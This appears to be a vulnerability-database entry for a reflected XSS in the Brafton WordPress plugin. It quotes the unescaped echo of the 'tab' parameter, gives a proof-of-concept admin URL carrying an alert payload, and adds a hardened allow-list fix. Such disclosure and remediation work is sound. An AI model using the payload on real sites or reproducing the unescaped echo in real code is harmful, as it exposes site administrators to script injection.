WordPress Plugin Vulnerabilities

brafton WordPress Plugin <=3.4.7 - Reflected XSS

Description

Title: brafton WordPress Plugin XSS

# Exploit Title : XSS vulnerability in brafton WordPress Plugin
# Date: Fri May 20 2016
# Reported Date : Fri May 20 2016
# Vendor Homepage: http://www.brafton.com/support/wordpress/
# Version: v3.3.10 – January 2016
# Software Link: https://github.com/ContentLEAD/BraftonWordpressPlugin/archive/master.zip
# Exploit Author : MehrdadLinux
# Tested On : Linux Platforms.
# Fix/Patching : Update To
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================

1. VULNERABILITY
-------------------------

brafton WordPress Plugin v3.3.10 – January 2016

2. BACKGROUND
-------------------------
This is the WordPress plugin for Brafton.

Brafton is a content marketing agency.
Our in-house teams develop and execute SEO-optimized content strategies,
from news to infographics.

3. DESCRIPTION
-------------------------
Reflected XSS in BraftonAdminPage.php: the tab query parameter is echoed unescaped into a JavaScript context, so whatever the browser sends in tab ends up in the page as script.

In line 11:
tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo 0;}?>;

Proof of concept:
wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))
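The vulnerable pattern from line 11 beside a hardened replacement, as an added example that is not the plugin's or the advisory author's code; the function names and the set of allowed tab ids are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's own code. Function names and the set of
// allowed tab ids are assumptions made for illustration.

// Vulnerable pattern (as in BraftonAdminPage.php, line 11): the raw query
// parameter is echoed straight into a JavaScript context, so whatever the
// browser sends is executed as script.
function brafton_tab_script_vulnerable() {
    ?>
    <script>
    tab = <?php if ( isset( $_GET['tab'] ) ) { echo $_GET['tab']; } else { echo 0; } ?>;
    </script>
    <?php
}

// Hardened replacement, two independent controls:
// 1. Input validation: the tab id is only ever a small known integer, so
//    coerce to int and fall back to 0 for anything outside the allow-list.
// 2. Output encoding: emit the value as a JSON literal so the browser sees a
//    number, never raw text. Inside WordPress, absint() and wp_json_encode()
//    are the equivalent core helpers.
function brafton_safe_tab( $raw, array $allowed = array( 0, 1, 2, 3 ) ) {
    $tab = (int) $raw;  // "alert(...)" and other non-numeric input become 0
    return in_array( $tab, $allowed, true ) ? $tab : 0;
}

function brafton_tab_script_hardened() {
    $tab = brafton_safe_tab( isset( $_GET['tab'] ) ? $_GET['tab'] : 0 );
    ?>
    <script>
    var tab = <?php echo json_encode( $tab ); ?>;
    </script>
    <?php
}

// Quick self-check of the sanitiser with constructed inputs.
assert( brafton_safe_tab( '2' ) === 2 );
assert( brafton_safe_tab( 'alert(1)' ) === 0 );
assert( brafton_safe_tab( '99' ) === 0 );
```

The allow-list is the control that actually closes the bug; the JSON encoding is defence in depth in case the parameter is later widened to accept strings.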

4. DISCOVERED BY
-------------------------

The vulnerability has been discovered by Mehrdad Abbasi (MehrdadLinux) and Hossein Masoudi (cs.masoudi).
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com

5. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

Classification

Type
XSS

Miscellaneous

Submitter
Mehrdadlinux
Verified
No

Timeline

Publicly Published
2016-05-20
Added
2016-09-07
Last Updated
2020-09-22